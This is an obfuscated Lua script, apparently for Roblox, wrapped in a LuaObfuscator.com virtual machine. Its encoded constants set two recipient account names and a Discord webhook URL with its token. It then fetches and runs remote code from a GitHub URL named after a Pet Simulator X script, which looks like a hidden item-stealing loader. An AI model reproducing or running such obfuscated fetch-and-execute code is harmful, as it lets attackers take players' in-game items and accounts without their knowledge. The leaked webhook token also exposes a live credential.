--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.7) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=0 -0 ;local v72;while true do if (v71==(877 -(282 + 595))) then v72=(v31/((1639 -(1523 + 114))^(v32-(1 + (957 -(892 + 65))))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v72-(v72%(932 -(857 + 74))) ;end end else local v73=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v73 + v73))>=v73) and (1 + (0 -0))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=(0 + 0) -0 ;local v35;local v36;local v37;local v38;while true do if (v34==(1 -0)) then return (v38 * ((87694796 -21013965) -49903615)) + (v37 * (65886 -(87 + 263))) + (v36 * (436 -(67 + 113))) + v35 ;end if (((1187 -(1069 + 118)) -(0 -0))==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 3 + 1 ;v34=1;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if ((1000 -(451 + 549))==v39) then v40=0;v41=nil;v39=1 + 0 ;end if (v39~=(4 -1)) then else v46=nil;v47=nil;v39=6 -2 ;end if (v39~=1) then else v42=nil;v43=nil;v39=2;end if (v39==2) then v44=nil;v45=nil;v39=3;end if (4==v39) then while true do if (v40==(1384 -(746 + 638))) then local v98=0;while true do if (v98==1) then v40=1 + 0 ;break;end if (v98==0) then v41=0 -0 ;v42=nil;v98=342 -(218 + 123) ;end end end if (v40==(1582 -(1535 + 46))) then v43=nil;v44=nil;v40=2;end if (2==v40) then local v99=0;while true do if (v99~=(0 + 0)) then else v45=nil;v46=nil;v99=1 + 0 ;end if (v99==(561 -(306 + 254))) then v40=1 + 2 ;break;end end end if (v40~=3) then else v47=nil;while true do local v100=0;local v101;local v102;while true do if (v100~=1) then else while true do if (v101==(0 -0)) then v102=1467 -(899 + 568) ;while true do if (v102==(1 + 0)) then if (v41==(4 -2)) then local v136=0;while true do if (0~=v136) then else local v166=603 -(268 + 335) ;local v167;while true do if (v166==(290 -(60 + 230))) then v167=0;while true do if ((572 -(426 + 146))==v167) then local v179=0;while true do if (v179~=(1 + 0)) then else v167=1457 -(282 + 1174) ;break;end if (v179==0) then for v188=812 -(569 + 242) ,v46 do local v189=0;local v190;local v191;local v192;local v193;while true do if (v189==(0 -0)) then v190=0;v191=nil;v189=1 + 0 ;end if (v189~=1) then else v192=nil;v193=nil;v189=2;end if (v189==(1026 -(706 + 318))) then while true do if ((1252 -(721 + 530))~=v190) then else v193=nil;while true do if (v191~=(1272 -(945 + 326))) then else if (v192==1) then v193=v22()~=0 ;elseif (v192==(4 -2)) then v193=v25();elseif (v192==3) then v193=v26();end v47[v188]=v193;break;end if (v191==0) then local v208=0 + 0 ;while true do if (v208==1) then v191=701 -(271 + 429) ;break;end if ((0 + 0)==v208) then v192=v22();v193=nil;v208=1;end end end end break;end if (v190==0) then local v197=1500 -(1408 + 92) ;while true do if (v197~=0) then else v191=1086 -(461 + 625) ;v192=nil;v197=1289 -(993 + 295) ;end if (1==v197) then v190=1 + 0 ;break;end end end end break;end end end v45[1174 -(418 + 753) ]=v22();v179=1 + 0 ;end end end if (v167==(1 + 0)) then v136=1 + 0 ;break;end end break;end end end if (v136~=(1 + 0)) then else for v173=530 -(406 + 123) ,v24() do local v174=0;local v175;local v176;while true do if (v174==(1769 -(1749 + 20))) then local v178=0;while true do if (v178==1) then v174=1;break;end if (v178~=0) then else v175=0;v176=nil;v178=1;end end end if (v174~=(1 + 0)) then else while true do if (v175~=(1322 -(1249 + 73))) then else v176=v22();if (v21(v176,1,1 + 0 )==(1145 -(466 + 679))) then local v181=0;local v182;local v183;local v184;local v185;local v186;while true do if (v181~=2) then else v186=nil;while true do if (v182==1) then local v195=0;while true do if (v195==0) then v185=nil;v186=nil;v195=1;end if ((2 -1)==v195) then v182=5 -3 ;break;end end end if (v182==2) then while true do if (v183==0) then local v200=0;local v201;while true do if (v200==0) then v201=0;while true do if (v201==0) then v184=v21(v176,1902 -(106 + 1794) ,3);v185=v21(v176,2 + 2 ,2 + 4 );v201=1;end if (v201~=1) then else v183=2 -1 ;break;end end break;end end end if (v183~=2) then else local v202=0;local v203;while true do if (v202==(0 -0)) then v203=114 -(4 + 110) ;while true do if (v203~=(584 -(57 + 527))) then else local v211=1427 -(41 + 1386) ;while true do if (v211==(103 -(17 + 86))) then if (v21(v185,1 + 0 ,1 -0 )==1) then v186[2]=v47[v186[5 -3 ]];end if (v21(v185,2,168 -(122 + 44) )==(1 -0)) then v186[3]=v47[v186[3]];end v211=1;end if (1==v211) then v203=1;break;end end end if ((3 -2)~=v203) then else v183=3 + 0 ;break;end end break;end end end if (v183==1) then local v204=0 + 0 ;local v205;while true do if (0~=v204) then else v205=0 -0 ;while true do if (v205~=(65 -(30 + 35))) then else local v212=0;while true do if (v212~=(1 + 0)) then else v205=1;break;end if (v212==0) then local v213=1257 -(1043 + 214) ;while true do if (v213==(3 -2)) then v212=1213 -(323 + 889) ;break;end if (v213==(0 -0)) then v186={v23(),v23(),nil,nil};if (v184==(320 -(53 + 267))) then local v218=0 + 0 ;local v219;while true do if ((413 -(15 + 398))~=v218) then else v219=982 -(18 + 964) ;while true do if (v219==(0 -0)) then v186[2 + 1 ]=v23();v186[3 + 1 ]=v23();break;end end break;end end elseif (v184==1) then v186[853 -(20 + 830) ]=v24();elseif (v184==(2 + 0)) then v186[3]=v24() -((128 -(116 + 10))^(2 + 14)) ;elseif (v184==3) then local v224=0;local v225;while true do if ((738 -(542 + 196))~=v224) then else v225=0;while true do if (v225==0) then v186[6 -3 ]=v24() -((1 + 1)^(9 + 7)) ;v186[4]=v23();break;end end break;end end end v213=1 + 0 ;end end end end end if (v205~=(2 -1)) then else v183=4 -2 ;break;end end break;end end end if (v183==3) then if (v21(v185,1554 -(1126 + 425) ,3)~=1) then else v186[409 -(118 + 287) ]=v47[v186[4]];end v42[v173]=v186;break;end end break;end if (v182==(0 -0)) then local v196=1121 -(118 + 1003) ;while true do if (0==v196) then v183=0;v184=nil;v196=1;end if (v196==1) then v182=1;break;end end end end break;end if (0==v181) then v182=0;v183=nil;v181=1;end if (v181~=(2 -1)) then else v184=nil;v185=nil;v181=379 -(142 + 235) ;end end end break;end end break;end end end v41=3;break;end end end if (v41==0) then local v137=0;local v138;while true do if (v137==(0 -0)) then v138=0;while true do if (v138==0) then local v177=0;while true do if ((0 + 0)~=v177) then else v42={};v43={};v177=978 -(553 + 424) ;end if (v177==1) then v138=1 -0 ;break;end end end if (v138~=(1 + 0)) then else v44={};v41=1 + 0 ;break;end end break;end end end break;end if (0==v102) then local v126=0 + 0 ;while true do if (v126~=0) then else if (v41==3) then local v168=0 + 0 ;local v169;local v170;while true do if (v168==1) then while true do if (v169==0) then v170=0;while true do if (v170==(0 + 0)) then local v187=0 -0 ;while true do if (v187==(0 -0)) then local v194=0 -0 ;while true do if (v194~=0) then else for v198=1 + 0 ,v24() do v43[v198-(4 -3) ]=v29();end return v45;end end end end end end break;end end break;end if (v168~=(753 -(239 + 514))) then else v169=0 + 0 ;v170=nil;v168=1;end end end if (v41~=1) then else local v171=1329 -(797 + 532) ;local v172;while true do if (v171==0) then v172=0;while true do if (0~=v172) then else v45={v42,v43,nil,v44};v46=v24();v172=1;end if (v172~=1) then else v47={};v41=2;break;end end break;end end end v126=1;end if (v126~=1) then else v102=1;break;end end end end break;end end break;end if (v100==0) then v101=1202 -(373 + 829) ;v102=nil;v100=1;end end end break;end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=0 -0 ;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (((2608 -(157 + 1718)) -(476 + 255))==v48) then v53=v21(v50,(935 + 216) -(369 + 761) ,18 + 13 );v54=((v21(v50,57 -25 )==(1 -0)) and  -(1 -0)) or (239 -((227 -163) + (594 -420))) ;v48=(1019 -(697 + 321)) + 2 ;end if (v48==(3 -0)) then if (v53==(336 -((391 -247) + 192))) then if (v52==((457 -241) -(42 + 174))) then return v54 * 0 ;else v53=1 + 0 ;v51=0 + 0 ;end elseif (v53==(870 + 1177)) then return ((v52==(1504 -(363 + 1141))) and (v54 * ((1581 -(1183 + 397))/(0 -(0 -0))))) or (v54 * NaN) ;end return v8(v54,v53-(750 + 273) ) * (v51 + (v52/((2 + 0)^(1665 -(1565 + 48))))) ;end if (v48==(0 + 0)) then v49=v24();v50=v24();v48=1;end if (v48==(1139 -(782 + 356))) then v51=268 -(176 + 91) ;v52=(v21(v50,1,1995 -(1913 + 62) ) * ((2 + 0)^(84 -52))) + v49 ;v48=1935 -(565 + 1368) ;end end end v26=nil;function v26(v55)local v56;if  not v55 then local v74=0 + 0 ;while true do if (v74==(0 -0)) then v55=v24();if (v55==0) then return "";end break;end end end v56=v3(v16,v19,(v19 + v55) -(2 -(612 -(602 + 9))) );v19=v19 + v55 ;local v57={};for v69=1228 -(322 + 905) , #v56 do v57[v69]=v2(v1(v3(v56,v69,v69)));end return v6(v57);end v18=5;end if (v18==2) then function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + (1191 -(449 + 740)) ;return (v60 * (1128 -(826 + 46))) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v75=0;while true do if (v75==0) then v20=v0(v3(v61,1,1));return "";end end else local v76=v2(v0(v61,16));if v20 then local v80=0;local v81;while true do if (v80==1) then return v81;end if (v80==0) then v81=v5(v76,v20);v20=nil;v80=1;end end else return v76;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v82=v66;local v83=v67;local v84=v68;local v85=v28;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==0) then v94=v82[v86];v95=v94[1];v97=1;end if (1==v97) then if (v95<=4) then if (v95<=1) then if (v95==0) then local v109=v94[2];local v110=v92[v94[3]];v92[v109 + 1 ]=v110;v92[v109]=v110[v94[4]];else local v114=0;local v115;while true do if (v114==0) then v115=v94[2];v92[v115]=v92[v115](v13(v92,v115 + 1 ,v87));break;end end end elseif (v95<=2) then v92[v94[2]]=v94[3]~=0 ;elseif (v95>3) then v92[v94[2]]=v94[3];else v92[v94[2]]=v64[v94[3]];end elseif (v95<=6) then if (v95>5) then v92[v94[2]][v94[3]]=v94[4];else v92[v94[2]]();end elseif (v95<=7) then local v119=v94[2];local v120,v121=v85(v92[v119](v13(v92,v119 + 1 ,v94[3])));v87=(v121 + v119) -1 ;local v122=0;for v123=v119,v87 do v122=v122 + 1 ;v92[v123]=v120[v122];end elseif (v95==8) then do return;end else local v131=0;local v132;local v133;while true do if (v131==1) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v64[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v131=2;end if (v131==5) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];break;end if (v131==0) then v132=nil;v133=nil;v92[v94[2]]=v64[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v131=1;end if (v131==2) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v64[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v131=3;end if (v131==3) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v64[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v64[v94[3]];v131=4;end if (v131==4) then v86=v86 + 1 ;v94=v82[v86];v133=v94[2];v132=v92[v94[3]];v92[v133 + 1 ]=v132;v92[v133]=v132[v94[4]];v131=5;end end end v86=v86 + 1 ;break;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O0003023O005F4703083O00557365724E616D65030F3O00632O6F6C6A6179706567323034353603093O00557365724E616D6532030C3O00632O6F6C6A617973616C743103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130373832313835333938363237313238352F52546D78422D63776A6B4B333251646B5F615972454C6A7544414A347976422D4C58664C43464A31325F326B755565393142516F454B576446472D6B4C595874496F6566030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572582D5363726970745A2F6D61696E2F505358534352254334254230505458000F3O0012093O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0002000400014O0007000100044O00015O00022O00053O000100012O00083O00017O00",v9(),...);end
